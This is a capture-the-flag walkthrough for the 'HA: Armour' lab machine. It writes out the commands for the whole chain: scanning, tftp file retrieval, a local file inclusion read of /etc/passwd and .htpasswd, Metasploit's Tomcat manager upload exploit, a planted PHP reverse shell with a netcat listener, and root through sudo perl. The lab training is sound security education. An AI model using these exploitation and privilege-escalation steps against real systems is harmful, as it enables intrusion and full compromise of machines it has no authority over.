This is our Walkthrough for “HA:
Armour” and this CTF is designed by Hacking Articles Team 😊, hope you
will enjoy this.
TASK: Klaw has stolen some armours from the Avengers
Super-Secret Base. Falcon has checked the manifest, following things are
unaccountable:
·
HulkBuster Armour
·
Spiderman Armour
·
Ant-Man Armour
·
Black Panther
Armour
·
Iron Man Armour
Klaw hide all these armours
and now it's up to you. Can you use your penetration skills to recover them
all?
Hint: P.S. Klaw has a habit of dividing his passwords
into 3 parts and save them at different locations. So, if you get some combine
them to move forward.
Level:
Lets Begin!!
Penetration Testing
Scanning Network
·
Netdiscover
·
Nmap
Enumeration
·
SSH
·
Abousing HTTP
·
Tftp
·
Dirb
·
LFI
Exploiting
·
Abusing Tomcat Manager (Metasploit)
·
Internal Recon
Privilege Escalation
·
Abusing
Apache2.conf
·
Abusing sudo
rights
Scanning Network
Firsts of all try to identify
our target and for this use the following command:
netdiscover
After you have identified your target using the above
command you can start with our second step by scanning the target. You can use
nmap to scan the target using the following command:
nmap -p- -A 192.168.1.101
Enumeration
With the help of scanning, you can find that port numbers
80, 8009, 8080 for HTTP (apache http, apache Jserv & apache tomcat) &
65534 for SSH are opened.
You will find the first "HulkBuster" armor when
connecting to SSH via port 65534 and the first hint: the Olympics as mentioned
above for Klaw.
ssh 192.168.1.101 -p65534
After getting HulkBuster, it was time to dig out another
Armor so you can connect to port 80 through a web browser.
Hmmmm! Well, the web page described the Armor Collection of
Marvel's famous characters; but you need to dig out more so that you can get a
hint.
Ahh!! So, as you can see from the image given below that from
inside the source code we found 3 things i.e. “armour, 69 and notes.txt” from
inside the comment.
Let’s check each hint one-by-one and identify what it says.
Assuming 69 could be a hint for any port, therefore using
nmap again to decide whether or not a service is running on port 69. Therefore,
we scan for the UDP protocol and give the following command:
nmap -sU -p69 192.168.1.101
Now, once you know that port 69 is open for tftp
operation, you can try connecting to tftp and check the list of available files
and directories.
Here you find the notes.txt file, which was mentioned
above, so you need to download this file to your local machine.
tftp 192.168.1.101
get notes.txt
From inside notes.txt file, you will get the second amour
which is for “Spiderman” and 2nd Hint:maybeevenawhich was
hide by Klaw.
At present you must be having two amours and two hints that
we have found till now. To identify third amour or hint we are going to use
dirb for brute forcing web directory to enumerate all files with .php extension.
dirb http://192.168.1.101
-X .php
With the of dirb you may find a URL for /file.php
page as shown in the below image.
http://192.168.1.101/file.php
But when you browse the /file.php page, you'll see a white
color page that's left blank, and it's seriously questionable why the author
has left file.php blank.
And if you are aware of the Vulnerabilities web application
and its Penetration Testing, then you would have known what kind of
misconfiguration it is.
In such a case, it is likely that the host system or
application is vulnerable to LFI (Local File Inclusion).
So, without wasting your time, you can try to access
/etc/passwd like we did here and say it's vulnerable to LFI.
When you dig more and more then inside
/etc/apache2/.htpasswd file you will find the third amour which for “Ant-Man”
and along this 3rd hint: StarBucks.
Now let’s recall the hint given by author:
P.S. Klaw has a habit of
dividing his passwords into 3 parts and save them at different
locations. So, if you get some combine them to move forward.
So, as you know that till now, we have found all 3 parts of
password as Hint1, Hint2 and Hint3; let’s combined them and identify how it
will help to move ahead.
http://192.168.1.101/file.php?file=/etc/apache2/.htpasswd
After combining Hint1, Hint2 and Hint3 you will have a
password:
TheOlympicsmaybeevenastarBucks
As you know port 8080 is available for Apache tomcat manager
and may be can login into tomcat server with the help of this password.
Exploiting Tomcat Manager
For login into tomcat manager we use following credential:
Username: Amour (found above from inside source code)
Password: TheOlympicsmaybeevenastarBucks
I hope you all are aware of Tomcat manager exploit available
in Metasploit framework, if not then read complete article from here.
So, without wasting time we are straight away logged into
Tomcat Server using Metasploit Tomcat Manager using the above credentials for
Tomcat Server Login.
use exploit/multi/http/tomcat_mgr_upload
set rhosts 192.168.1.101
set rport 8080
set httpusername armour
set httppassword TheOlympicsmaybeevenastarBucks
exploit
Booom!! Our favorite meterpreter session is all here,
let’s go for Post enumeration.
netstat -antp
If you check your local network static for TCP and UDP
connections, you'll see that there's something running 8081, and even nmap
doesn't display anything for this. With the aid of the meterpreter, we have
forwarded service port 8081 to our local host:8081.
portfwd add -l 8081 -p 8081 -r 127.0.0.1
Once you have forwarding the service over your local machine
the you can explore it the web browser as we have done here.
http://127.0.0.1:8081
This will give you the fourth amour for “Black-Panther” 😎
Privilege Escalation
This lab is like Rabbit hole where Enumeration is key for
identifying loopholes or further hint. Similarly, we enumerate that
/apache2.conf and /html owns writable permission.
Since we know apache2.conf has all permission therefore
we’ll try to edit this file for escalating privilege of another user.
This machine has an user profile named as “aarti” that we
had enumerated through /etc/passwd and now try to add a user:aarti and group:aarti
inside the /etc/apache2/apache2.conf so that we will leverage it for privilege
escalation. So, the idea is when we restart the apache service it will get
executed with aarti user privileges.
So, we have simple copied the entire content of the
apache2.conf file in our local machine and made changes as said above.
Then download the modified apache2.conf from your local
machine into the host machine and replaced the original apache2.conf file as we
have done here.
As you know the /html has full permission which mean inject
the php backdoor in this web directory. Parallelly
we grabbed a php-reverse-shell from /usr/share/webshells/php and modified the
listener IP as ours and named it as shell.php.
Then downloaded the shell into /var/www/html folder so that
we can access it through browser.
To make the apache service run as aarti user we have to
restart the apache service, thus reboot the machine.
cd /var/www/html
After reboot is complete, we just executed the shell.php
script in the browser and at the same time started a netcat listener on your
kali.
nc -lvp 1234
http://192.168.1.101/shell.php
After some time, we got a reverse netcat shell on our local
machine for user aarti. Now let’s check sudo rights for this user.
sudo -l
Here you can observe that it shows that user aarti has sudo
right to run perl application as root which means we can try to abuse its sudo
for escalating root privilege.
sudo perl -e 'exec "/bin/bash";'
Boom!! We have the root shell access, let’s find the fifth
and final amour. You can find it inside the /root directory within final.txt.
cd /root
cat final.txt
And the final amour is my favorite “Iron-man” 🤗
0 comments:
Post a Comment